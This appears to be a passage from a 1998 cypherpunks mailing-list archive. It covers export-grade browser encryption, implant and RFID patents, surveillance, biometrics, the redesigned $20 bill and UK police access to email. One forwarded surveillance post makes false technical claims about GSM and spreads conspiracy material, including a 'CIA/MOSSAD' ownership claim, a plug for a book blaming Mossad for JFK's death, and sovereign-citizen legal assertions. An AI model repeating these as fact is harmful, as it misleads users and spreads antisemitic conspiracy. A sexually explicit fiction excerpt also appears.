Yes, the papers will be refereed and the editorial board has some weight in
the IT security world.

Our editorial committee now includes: Andy Smith, Dr John Tongren and Dr
Joseph Williams


On that note this is the second Call for papers.

We are looking for papers on Information Technology Security and fitting
within the following broad areas: Audit, Design and Maintenance of IT
Security.

The Papers can be from 1000 to 2500 words. We may accept papers of down to
600 words or up to 5000 words but they will have to be of the utmost quality. 

For more information see http://www.ticm.com/info/insider/current.html 

Yours 

Bret Watson - Editor
Technical Incursion Countermeasures 
consulting@TICM.COM                      http://www.ticm.com/
ph: (+61)(041) 4411 149(UTC+8 hrs)      fax: (+61)(08) 9454 6042

The Insider - a e'zine on Computer security - August Edition out
http://www.ticm.com/info/insider/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Wed, 16 Sep 1998 13:32:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: 128 bit or 40 bit?
Message-ID: <199809161832.UAA23457@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <67ee9e3cc8499f9d72a11a2df56c48fe@anonymous> you wrote:


: Being outside North America, I have an "export" version of 
: Internet Explorer/Netscape Navigator. These offer 40 bit 
: encryption. (40 bit RC4, I understand).


: My financial institution has a 128 bit Verisign certificate.
: To my surprise, they claim this offers 128 bit encryption to /me/.
: [in transactions to https://secure.mybank.com.xx]

: I thought my 40 bit client limited the security to 40 bits.
: Who is right? Please explain.

All browsers have the 128 bits encryption inthem, but in the
non-US version it can only enabled by a 'special cert'. Banks
are the only institutions that are currently allowed to recieve
such an cert.

This is also why fortify.net works as it does, anyways,
we also offer 128 bit versions of the popular browsers *g*
--
Alex de Joode | International CryptoRunners | http://www.replay.com
         'A little paranoia can longer your life'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lazlo Toth <lazlototh@hempseed.com>
Date: Wed, 16 Sep 1998 20:10:32 +0800
To: cypherpunks@toad.com
Subject: Caligula, My Father, Bill Clinton
Message-ID: <v04011702b2260ce487ba@[199.125.99.133]>
MIME-Version: 1.0
Content-Type: text/plain



I think people are finding it much easier to relate to your Mr. Clinton
lately...

-Lazlo

-------------
Caligula, My Father, Bill Clinton
by Sam Lipsyte
>From Nerve Magazine
http://www.nervemag.com/Lipsyte/caligula/

>...
>     Of course you want her breasts first. I want her breasts first. I
>want her in the blue-black dress and I want her breasts first.
>     I am the President. I've been doing this shit all my life, and I want
>her breasts first. I can tell what they will look like already, round and
>full and pale with a tiny beautiful vein  like a quiet river running to
>her heart. I want to squeeze and suckle. That's all I ever really ever
>ever wanted. The suits, the speeches, sure, the airplane, sure, but those
>fuckers are always after me for more and more of me and this is all I ever
>wanted.
>     I want her ass and her belly and her hair and her lips.
>     Those fuckers.
>...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 18 Sep 1998 16:42:08 +0800
To: "I.A. Eaglemail" <eaglemailbox@hotmail.com>
Subject: Re: Hacker D00D
In-Reply-To: <19980918194942.2300.qmail@hotmail.com>
Message-ID: <Pine.BSF.3.91.980916210942.8037D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Fri, 18 Sep 1998, I.A. Eaglemail wrote:

> >You've been listed again. Looks like this whole sixdegrees 
> >thing is working. Your networking potential is growing by the 
> >second. Hacker D00D listed you as "Mother."
> >
> >Please let us know if you are in fact Hacker's Mother:

Well, they got it half right ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 23:13:25 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: U.S. Patent Programmable subcutaneous visible implant
Message-ID: <199809170414.VAA28118@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)
Subject: SNET: U.S. Patent Programmable subcutaneous visible implant
Date: Thu, 17 Sep 1998 01:35:49 +1200
To: snetnews@world.std.com


->  SNETNEWS  Mailing List

United States Patent

5,638,832
 Singer, et. al.

Jun. 17, 1997


Programmable subcutaneous visible implant

                                              Abstract

A subcutaneous implant for displaying various re-programmable information
or decorative patterns beneath the surface of the skin of a person or an
animal. A biologically inert subcutaneous implant is constructed of a
flexible material so as to conform to the skin's surface. The subcutaneous
implant includes a battery for providing power to the implant. The
subcutaneous implant also includes a receiver for receiving programming
information from a user, and a display for displaying the programming
information through the skin.


 Inventors:
           Singer; Andrew J. (Palo Alto, CA); White; Sean (San Francisco, CA).
 Assignee:
           Interval Research Corporation (Palo Alto, CA).
 Appl. No.:
           477,096
 Filed:
           Jun. 7, 1995

 Intl. Cl. :

A61B 19/00
 Current U.S. Cl.:

128/899
 Field of Search:

128/897-899, 654


                                 References Cited | [Referenced By]

                                        U.S. Patent Documents
      4,233,964
                             Nov., 1980
                                                 Jefferts et al.

128/899
      5,041,826
                             Aug., 1991
                                                 Milheiser
      5,074,318
                             Dec., 1991
                                                 Campbell et al.
      5,205,286
                             Apr., 1993
                                                 Soukup et al.

128/899
      5,322,034
                             Jun., 1994
                                                 Willham et al.
      5,324,940
                             Jun., 1994
                                                 Ekstrom
      5,482,008
                             Jan., 1996
                                                 Stafford et al.

128/899


Primary Examiner: Cohen; Lee S.
Assistant Examiner: Lacyk; John P.
Attorney, Agent or Firm: Brooks & Kushman
                                   19 Claims, 4 Drawing Figures



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 23:13:30 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: U S Patent: Identification system
Message-ID: <199809170415.VAA28178@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)
Subject: SNET: U S Patent: Identification system
Date: Thu, 17 Sep 1998 01:35:51 +1200
To: snetnews@world.std.com


->  SNETNEWS  Mailing List

United States Patent

5,041,826
 Milheiser

Aug. 20, 1991


Identification system

                                              Abstract

A passive integrated transponder (PIT) is attached to or embedded in an
item to be identified. It is excited via an inductive coupling from an
interrogator. The PIT responds to the interrogator via the inductive
coupling with a signal constituting a
stream of data unique to the identified item. The signal is in the form of
two different frequencies, a shift from one frequency to the second during
a bit cell representing a data "one", and a shift from the second frequency
to the first frequency representing a data "zero". The responsive signal is
then detected and processed for utilization in a data storage or display
device.


 Inventors:
           Milheiser; Thomas A. (Littleton, CO).
 Assignee:
           Destron/IDI Inc. (Boulder, CO).
 Appl. No.:
           481,833
 Filed:
           Feb. 16, 1990


                                   Related U.S. Application Data
    Division of Ser No. 388,761, Aug. 2, 1989, abandoned, which is a
continuation of Ser. No. 165,310, Mar. 8,
    1988, abandoned, which is a division of Ser. No 814,492, Dec. 30, 1985,
Pat. No. 4,730,188, which is a
    continuation-in-part of Ser. No. 580,401, Feb. 15, 1984, abandoned.

 Intl. Cl. :

H04Q 1/00
 Current U.S. Cl.:
                                                               340/825.54;
340/825.69; 375/272; 455/41
 Field of Search:
                                                  340/825.54, 825.55,
825.69, 825.72, 825.34, 825.94, 572;
                                                         455/118, 41;
375/45, 62, 78, 81, 52; 370/53, 112


                                 References Cited | [Referenced By]

                                        U.S. Patent Documents
      3,109,143
                             Oct., 1963
                                                  Gluth

375/81
      3,510,779
                             May, 1970
                                                  Klapper

375/81
      3,689,885
                             Sept., 1972
                                                  Kaplan et al.

455/41 X
      4,287,596
                             Sept., 1981
                                                  Chari

375/52 X
      4,313,033
                             Jan., 1982
                                                  Walker et al.

370/112 X
      4,368,439
                             Jan., 1983
                                                  Shibuya et al.

375/62 X
      4,388,730
                             Jun., 1983
                                                  Nash et al.

375/81 X


Primary Examiner: Weldon; Ulysses
Attorney, Agent or Firm: Sirr; Francis A., Hancock; Earl C.
                                   14 Claims, 8 Drawing Figures

                                              [USPTO]



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 23:18:07 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: Satellite offers spy pictures by credit card
Message-ID: <199809170415.VAA28196@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)
Subject: SNET: Satellite offers spy pictures by credit card
Date: Thu, 17 Sep 1998 03:06:46 +1200
To: snetnews@world.std.com


->  SNETNEWS  Mailing List

http://www.mcs.net/~lpyleprn/jpfo.html <- Looks like a noble effort
[jpfo@prn-bbs.org] JFPO Jews for Preservation of Firearms Ownership

"The illegal we do immediately. The unconstitutional takes a little longer."

--Henry Kissinger

TODAY's COMMUNIQUE
==================

Satellite offers spy pictures by credit card
============================================

First a little on the handy...

BIG BROTHER WATCHING

Has anybody thought about the fact why Goverments are pushing the
GSM-Handys so much. More and more people will change over to the "handy"
Handy, not thinking that this system is utterly unsafe.

There are various A5 chips build-in which supposed to encrypt the
conversation between the Handy and the nearby station. This encryption - if
there is any at all - can be switched off and is a 4 Bit Kode which can be
cracked in Minutes.

But the biggest danger was exposed by the (Swiss) Berner Sonntagszeitung
which wrote that the Swisscom - which really belongs to AT&T or another
US-company (a subsidiary of the CIA/MOSSAD) is collecting data from every
GSM-User and the movement of the owner for at least 6 Months
(Bewegungs-Profile). The owner of a GSM Handy can be located with the GPS
(General Position System and Sattelites) within few Meters, no matter if he
uses the Phones or not.

The complete German Text (article) you will find on the Ostara-Website
http://www.ostara.org/autor/gsm.txt

The question is now what can we do, because the same "big brother" things
are going on everywhere and nobody knows who is exchanging data with whom.
Not only the owner of the GSM will be recorded, but also the telefon Nr. of
the receiver. And this warning goes even more for people using ISDN which
is no problem to hack into.

The Story of the LOTUS-NOTES where the US-Goverment holds the decryption
key is well known by now - hopefully.


If you have to use a Handy, use a anonymous Credit-card Handy where you can
buy the cards in any communication shop with cash (no bankcredit-card).


30.12.1997

fwd from:

Satellite offers spy pictures by credit card By Robert Uhlig, Technology
Correspondent Electronic Telegraph UK.


THE first civilian spy satellite will soon allow anyone with a credit card
to peek into a neighbour's garden or a highly secret military base for as
little as engl. Pounds 200,-

EarlyBird 1, the first commercial spacecraft to use recently declassified
spy technology, was successfully launched from a military base in eastern
Russia last week, ending the 40-year monopoly of the world's most advanced
military and intelligence services on gathering high-resolution pictures
from space.

EarthWatch Inc, the satellite's owner, confirmed yesterday that, subject to
a last calibration and alignment test, it was ready to start broadcasting
clandestine pictures from its orbit 295 miles above Earth.

With the exception of the governments of Cuba, North Korea, Libya, Iraq and
Iran, anybody can order highly-detailed images from anywhere in the world,
for as little as 31.80 per square foot, subject to a 3200 minimum order.

The sharpest commercial satellite images available now capture features no
smaller than 33ft across, good enough for media pictures of the Tiananmen
Square massacre but not detailed enough for covert examinations of
neighbours' activities.

However, once EarlyBird 1 starts taking pictures, customers will be able to
control it via the Internet and place orders for black-and-white pictures
that will show features as small as 10ft across.

EarthWatch promises that pictures will be taken and sent to customers
within two days of receiving the target co-ordinates. "It's detailed enough
to distinguish a car from a truck, or to measure the size of a neighbour's
extension," said Bob Wientzen, an EarthWatch spokesman. Colour pictures
will also be offered, but with a resolution of only within 45ft.

Most of the time, the satellite is expected to focus on targets related to
town planning, map-making, disaster relief or mining. It will also allow
the media and the public to scrutinise environmental and military crises.

Some industry experts expect the biggest customers to be foreign
governments and intelligence agencies who do not have access to spy
satellite networks of their own.

Companies in India, Israel, Russia, China and America plan to launch a
further generation of spy satellites capable of distinguishing objects with
a diameter of about three feet.

--=====================_883451814==_--

http://TeamInfinity.com/~ralph/dl.html

Electric Eye in the Sky is a song by ? [Take a guess]
======================================

The lyrics go like this.

Electric Eye

Up here in space
I'm looking down on you.
My lasers trace
Everything you do.

You think you've private lives
Think nothing of the kind.
There is no true escape
I'm watching all the time.

I'm made of metal
My circuits gleam
I am perpetual
I keep the country clean.

I'm elected, electric spy
I'm protected, electric eye.

Always in focus
You can't feel my stare.
I zoom in on you
You dont know I 'm there.
I take a pride in probing all your secret moves My tearless retina takes
pictures that can proof.

Electric eye, in the sky
Feel my stare, always there
There's nothing you can do about it.
Develop and expose
I feed upon your every thought
And so my power grows.

Protected... Detective... Electric Eye...

If you would like to hear this song, please ask.

In our neck of the woods, We have a new system called "Aggressive Driving
Imaging" but the state will not divulge details of this system to us. I
thought we paid their salaries, etc, how can they "not disclose the details
of the system to us". With the numerous "Red Light" cameras ($50,000 a
piece $5000 to install) up that automagically mail tickets to the OWNER of
the car that ran the light, you will have friends and family (who borrowed
the car) being forced to testify against themselves to prevent the owner
from being deprived of his property. Since same cannot be forced to bear
witness against themself, where is the due process that must precede the
taking of the owners property, however small it may start out to be ?


Keep in mind that if there is no victim there is no crime, and that you
should always be able to face your accuser, and that the state cannot sue
or be sued, fair is fair right ? i.e. the plaintiff MUST be an individual
of flesh and blood. Also the right to travel by the means available in your
day, is a RIGHT, not a priviledge, and as such CANNOT be licensed or taxed
or infringed in any manner whatsoever against your will if noncommercial.
(SEE: http://TeamInfinity.com/~ralph/dl.html) And how are eye level camera
shots of people in their cars legal when there is NO PROBABLE CAUSE and no
SIGNED SPECIFC WARRANT !? http://www.bts.gov/smart/cat/images/274/274F1.GIF



Some urls to explore:

http://webserv.dot.co.montgomery.md.us/jpgcap/camintro.html
http://www.atmsonline.com (latest in this sick industry)
http://www.truckers.com/trafcam.htm
http://www.dcn.com/usa.html
http://www.bts.gov/smart/cat/images/274/274F1.GIF
http://TeamInfinity.com/~ralph/dl.html


Looking for more maps of exact locations of these cameras and police state
devices so we can share them with others and compile an exhaustive
inventory of them. We should be allowed to know where the NO-PRIVACY ZONES
ARE and start letting others know the scope breadth and depth.


CAUGHT

You used to watch television. Now it watches you.

By Phil Patton
_________________________________________________________________


It's early morning in the 'burbs. My eyes are barely open, but the video
eye is on me. I stop by the convenience store for coffee and newspapers. On
the grainy screen of a boxy monitor behind the clerk, I catch a glimpse of
a tiny figure that, after a moment, I realize represents me. Opening my
wallet reminds me that I'm as short of cash as usual, so I stop at the ATM.
Through a one-way mirror, a video camera is recording the transaction.

I drive along New Jersey's Route 3 toward New York City, quite possibly
under the video observation of the New Jersey State Police, my state being
one of several that have tested remote stations that capture radar-gun
readings and license-plate numbers and mail out speeding tickets.

As I descend the dread "helix" into the Lincoln Tunnel, I go on TV for
Panasonic. Atop a huge billboard advertising the company's camcorders is
the "Panasonic Traffic Cam," an absurdly tiny device that perches like an
insect above a sign bearing the face of a white-knuckled driver. The driver
looks a bit like the late John Candy - all exasperation as the kids behind
him quibble and scream.

I can tune the radio to 1010 WINS to hear what the camera sees: in a
cunning marketing tie-in, I get "reports from the Panasonic Traffic Cam
high above the helix - there's a 15 minute delay at the Lincoln...."

CUT, if you would like to read the rest of this ESQUIRE MAGAZINE Article,
let me know and I will forward it to you... ralph

Phil Patton (pattonp@pipeline.com) is a contributing editor to Esquire. He
is the author of Made in the USA.



------------------------------------------------------------------------


Write Peter.Navy@Rocketmail.com to find the BLOCKBUSTER suppressed book:


"Tragedy & Hope" by Carroll Quigley


------------------------------------------------------------------------


To find out how to get the suppressed hush hush 384 page BLOCKBUSTER book:

"FINAL JUDGEMENT" by Michael Collins Piper, that argues that ISRAEL's
MOSSAD murdered President John F. Kennedy, or Myron Fagan's tapes, contact
peter.navy@rocketmail.com and ask for a FREE copy of The SPOTLIGHT.

---------------------------

TO RECEIVE email from ralph: send email to ralph@TeamInfinity.com and in
the Subject make sure your email address and the word GO-RALPH (no spaces)
is in the subject.

TO STOP RECEIVING email from ralph: send email to ralph@TeamInfinity.com
and in the Subject make sure your email address and the word WHOA-RALPH (no
spaces) is in the subject.



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 23:14:21 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Redesigned $20 Bills Debut Sept. 24
Message-ID: <199809170415.VAA28233@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Redesigned $20 Bills Debut Sept. 24
Date: Wed, 16 Sep 1998 10:08:59 -0500
To: believer@telepath.com

Source:  Department of Defense
http://www.defenselink.mil/news/Sep1998/n09151998_9809157.html

[Note: Images at this site if you want to look at the new bill.]

Redesigned $20 Bills Debut Sept. 24 
 By Rudi Williams
 American Forces Press Service

 WASHINGTON - The government rolls out its new redesigned high- tech,
tough-to-copy $20 bill worldwide Sept. 24.
 
 Revamped $50 and $100 notes are already in circulation. The $20  bill,
though, is key to thwarting counterfeiters, because it's  the most widely
circulated "big bill" and the most  counterfeited, Secret Service
spokeswoman Chaun Yount said. The  Secret Service -- the organization that
guards the president --  is the Treasury Department unit that oversees
counterfeiting  issues.
 
 Both sides of the redesigned $20 bills include numerous
anti-counterfeiting measures, she said. Security features include embedded
threads with micro-printing; a watermark; a large, off-center portrait of
President Andrew Jackson with micro-printed words and hard-to-copy engraved
details; the Federal Reserve seal; and color-shifting ink.
 
 Yount said people are the first line of defense against counterfeiting.
People need to be familiar with the new twenties because they'll be seeing
a lot of them, she said. According to U.S. Treasury figures, the mints
print $20 notes in numbers second only to $1 notes.
 
 "We always have $20 bills in our pocket, if we're lucky," she noted. "The
general public pays little attention to the $20 bill because it's the most
commonly used note. Counterfeiters look at that as an opportunity. They
like twenties because of their 'nice profit margin'" -- they have the
highest face value that doesn't draw most people's attention, and passable
fake twenties cost no more to make than fake fives and tens.
 
 "People who are passing counterfeit money are looking for a high volume of
cash," she said. "They target people who are rushed and don't take time to
authenticate the bills." She said military people are not typical targets
of counterfeiters. However, the Treasury Department has been working with
possible targets, such as the military exchange services, to train
employees on the look and security features of the new $20 bill.
 
 In 1995, $231 million worth of counterfeit U.S. money was seized
worldwide, Yount noted. That dropped to $64 million in 1996 and 1997 after
the similarly redesigned $100 and $50 notes were introduced.
 
 She said the new notes will spread as fast as financial institutions order
$20 bills and circulate them. "So for some time, the old and new $20 bills
will circulate at the same time," she noted. "As the old $20 bills wear
out, they'll be replaced with the new ones. The life of a $20 bill is about
two years."
 
 Treasury officials are working on new, high-tech $1, $5 and $10 notes with
anti-counterfeiting features. For more information about redesigned U.S.
currency, visit the Treasury Department Web sites at www.treas.gov or
www.moneyfactory.com/currency/20.cfm.
 
 [IMAGE}  Security features on the front of the new $20 note include an
embedded security
thread; a large, off-center portrait of President Andrew Jackson; the
Federal Reserve
seal; and color-shifting ink. U.S. Treasury Department 

[IMAGE}  The backside of the new $20 note contains fine-line printing
patterns; an
easy-to-read large $20 numeral; and an embedded security thread. U.S. Treasury
Department 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 23:13:36 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Digital Biometrics Awarded Rhode Island State Contract
Message-ID: <199809170415.VAA28262@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Digital Biometrics Awarded Rhode Island State Contract
Date: Wed, 16 Sep 1998 12:00:41 -0500
To: believer@telepath.com

Source:  PR Newswire
http://www.prnewswire.com

Digital Biometrics Awarded Rhode Island State Contract 

      DBI Tenprinter 1133S Systems Selected For Rhode Island's Live-Scan
                                Fingerprinting

   MINNEAPOLIS, Sept. 15 /PRNewswire/ -- Digital Biometrics, Inc. (Nasdaq:
DBII) a leader in biometric identification systems integration company,
today announced the award of the Rhode Island State contract for an initial
order of six TENPRINTER 1133S live-scan fingerprinting systems.  These
systems will enable police agencies to eliminate the need for the
traditional ink method of taking fingerprints, and significantly speed
fingerprint processing of criminal and suspected criminal fingerprints with
a higher degree of accuracy.
 
    Live-scan systems such as the 1133S are special-purpose computer-based
systems which capture, digitize and transmit fingerprint images, and
provide a significant improvement in image quality and ease-of-use compared
to the traditional ink-based method of taking fingerprints.  Live-scan
systems are used in law enforcement and increasingly in non-law enforcement
applications such as employment screening, new employee enrollment,
firearms registration, and security screening.

    James C. Granger, President and Chief Executive Officer of Digital
Biometrics commented, "We are very pleased that Rhode Island has chosen DBI
for their fingerprinting network.  Rhode Island joins the growing list of
states that have chosen our live-scan technology." 

    Rhode Island joins Minnesota, Michigan, Ohio, Pennsylvania,
Connecticut, Oregon, Nevada, Alabama, Indiana, Illinois, North Carolina,
Tennessee, Colorado, California and Virginia as recent U.S. purchasers of
Digital Biometrics TENPRINTER Series live-scan fingerprinting systems.
Digital Biometrics also supplies live-scan systems to the Scottish Criminal
Records Office and has recently won an OEM agreement with TRW for England
and Wales. 

    Digital Biometrics is a provider of biometric identification systems
and systems integration services. DBI is a leading supplier of computer
systems-based products and services for fingerprint capture for law
enforcement and commercial applications. In addition, its Integrated
Identification Solutions Division delivers total solutions through
customized applications and product integration to solve complex
information systems
problems, including identification problems, in commercial and government
markets.

SOURCE Digital Biometrics, Inc.

(c)1998 PR Newswire.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 23:13:50 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Biometrics: SAC Tech: Complete Electronic Security Solution
Message-ID: <199809170415.VAA28279@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Biometrics: SAC Tech: Complete Electronic Security Solution
Date: Wed, 16 Sep 1998 12:02:58 -0500
To: believer@telepath.com

Source:  PR Newswire
http://www.prnewswire.com

SAC Technologies Showcases Complete Electronic Security Solution 

              Company To Unveil Next Generation Biometrics Technology
                Prototype Product at Security 2001 Conference

    NEW YORK, Sept. 16 /PRNewswire/ -- SAC Technologies, Inc. (Nasdaq:
SACM), a biometrics technology development company, today announced the
Company will unveil a manufacturing prototype of its fully integrated
solution for electronic security applications through biometrics
identification technology at the September 16-17, 1998 Westergaard/Mallon
Security 2001 Conference in New York.

    "A recent survey by the American Society for Industrial Security noted
that losses due to intellectual theft have reached almost $300 billion,"
according to SAC CEO Mr. Barry Wendt. "Computer security is a major concern
with electronic commerce, Internet transactions, on-line banking and
security in general.  Unlike other security measures such as PIN numbers,
passwords or tokens which can easily be lost, stolen or forgotten,
biometrics technology is based on an individual's physical characteristics,
such as a fingerprint, so
it requires the physical presence of an authorized user." 

    SAC Technologies, Inc. plans to introduce the next evolution of its
SACcat(TM) product at the two-day investment conference.  Bundled with
'best of breed' biometrics technology consisting of fingerprint
identification, voice verification and facial recognition, SACcat(TM)
features software applications of computer log-on, screen-saver, and
desktop security and configuration.  Additional integrated software
applications will include Bio-Key(TM) secured video teleconferencing and
video e-mail and SAC_Secure(TM) for selectively encrypting program
applications, data files and network communications using Certicom Corp.'s
elliptic curve engine.

    At the heart of SAC's biometric identification technology is the
Company's "Vector Line Type" Algorithm (VLTA) considered by some to be the
most robust, reliable, scaleable and discriminating algorithm available
today.  VLTA represents a true paradigm shift from current industry
minutiae-based methods of storing and analyzing fingerprints.  VLTA
processes the entire pattern of the fingerprint to derive a list of vector
line types and their associated relationships.

    These unique characteristics of the fingerprint are subsequently
transformed into a vector line type mathematical model or Bio-Key(TM),
which is highly unique and easy to process for comparative purposes.

    Unlike biometric verification (one-to-one matching) processes produced
by its competitors which require an additional identifier (pin number,
token or password), SAC's technology provides for true, real-time
identification (one-to-many) -- the process of comparing the biometric
characteristics of an unknown individual against characteristics stored in
a database to determine their identity.  SAC's certified biometric
identification technology can provide the necessary discrimination to
determine the identity of a user and
thereby insure the integrity of an application by eliminating the
possibility of 'aliases' (multiple identities).  SAC is the first, and
currently remains the only, company in the world to earn the International
Computer Security
Association's (ICSA) biometric 'identification' certification.

    "This latest version of the SACcat(TM) product is a 'turn-key,'
cost-effective hardware and software biometrics security and convenience
solution for individual computer workstations and networks," said Mr.
Wendt.  "We believe that SACcat(TM) is an ideal complement to computer
network security suites provided by such companies as Network Associates,
Secure Computing, Check Point and Security Dynamics."

    "Within a year from now I am convinced that consumers will be asking
whether biometrics security is included in their information systems and
computer applications.  Companies who do not add biometric security to
their product offerings will lose market share.  Compaq, one of the world's
largest providers of PCs, will have a biometrics peripheral product
available this fall.  Other computer providers could gain competitive
advantage by negotiating an exclusive license with the Company to
manufacture, embed and
distribute SACcat(TM) technology," added Mr. Wendt. 

    Companies interested in SAC Technologies' SACcat(TM) biometric security
solution should contact Mr. Barry Wendt at 708-798-9777 or for more
information on the Company check out its website at http://www.sacman.com. 

    Safe Harbor Statement
 
    Statements contained herein, other than historical data, may be
forward-looking and are subject to risks and uncertainties including, but
not limited to the Company's ability to successfully integrate its
technology with other technologies, and its ability to achieve its sales
and marketing plans while effectively managing costs and expenses, as well
as those risks set forth in the Company's 10KSB, 10QSB, and other SEC filings.

SOURCE SAC Technologies
Web Site: http://www.sacman.com

(c)1998 PR Newswire.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 23:13:43 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ****British Police Attempt To Sidestep E-mail Protection
Message-ID: <199809170415.VAA28313@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Richard Sampson <rjsa@sprintmail.com>
Subject: IP: ****British Police Attempt To Sidestep E-mail Protection
Date: Wed, 16 Sep 1998 14:15:28 -0400
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>

****British Police Attempt To Sidestep E-mail Protection
 LONDON, ENGLAND, 1998 SEP 16 (Newsbytes) -- By Steve Gold, Newsbytes.
Newsbytes' sources have revealed that the Metropolitan Police have been
holding a series of low-key discussions with major Internet service
providers (ISPs) in the UK, aiming to streamline police access to
e-mail and ISP user logs.

According to one reliable source, the aim of the discussions is to
develop a ground-breaking agreement between the police and ISPs so
that, where the police have reasonable suspicion that an individual is
sending or receiving e-mail, or downloading images that involve
paedophilia, then they can formally request full details of the
Internet user's mailbox and system logs, for example, from the ISP in
question.

While the aim of the project is to avoid the need for police to
obtain a formal court order to access the ISP's computer systems,
Newsbytes expects there to be a massive outcry from civil libertarian
groups, since the police order could well be implemented against anyone
with an account with a British ISP.

Newsbytes understands that an expose on the police plans will be
broadcast on Channel 4 news at 19:00 hours on British television this
evening.

Newsbytes' sources suggest that British ISPs are under immense
pressure to comply with the police system since, if they do not comply
and request a court order, the police could theoretically impound their
computer systems, effectively putting an ISP out of action, and perhaps
business, for an unknown period of time.

"While I can understand the police wanting to gain access to Internet
users' files who are accessing the Net for paedophile images, this does
seem something of a steamroller approach," said one industry source who
spoke to Newsbytes after agreeing anonymity.

Newsbytes notes that a major flaw exists in the British police's
modus operandi for the proposed system, since the e-mail file servers
for America Online (AOL) and CompuServe (AOL is the UK's largest ISP)
are held in the US. Only the company's sales and support operations are
located in the UK.

"It will be interesting to see how the management of AOL and
CompuServe in the US react to the news that they have to willingly hand
over user logs and e-mail files to the British police," said the
anonymous source.

As has been proven by various cases in the US, the normal legal
protection afforded postal and telephone communications by anti-
wiretap legislation is not automatically extended to include e-mail.

In the UK, it had been thought that the Interception of
Communications Act might apply to e-mail, but the law relating to
e-mail remains unproven, Newsbytes notes.

Reported by Newsbytes News Network, http://www.newsbytes.com .

-0-

(19980916/WIRES LEGAL, ONLINE/)


News provided by COMTEX.
[!BUSINESS] [!HIGHTECH] [!INFOTECH] [!PUBLIC+COMPANIES] [!WALL+STREET]
[BUSINESS] [COMPUTER] [E-MAIL] [ENGLAND] [GOLD] [INTERNET] [LEGISLATION]
[LONDON] [NBY] [NEWS] [NEWSGRID] [ONLINE] [POLICE] [SALES] [TELEVISION]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
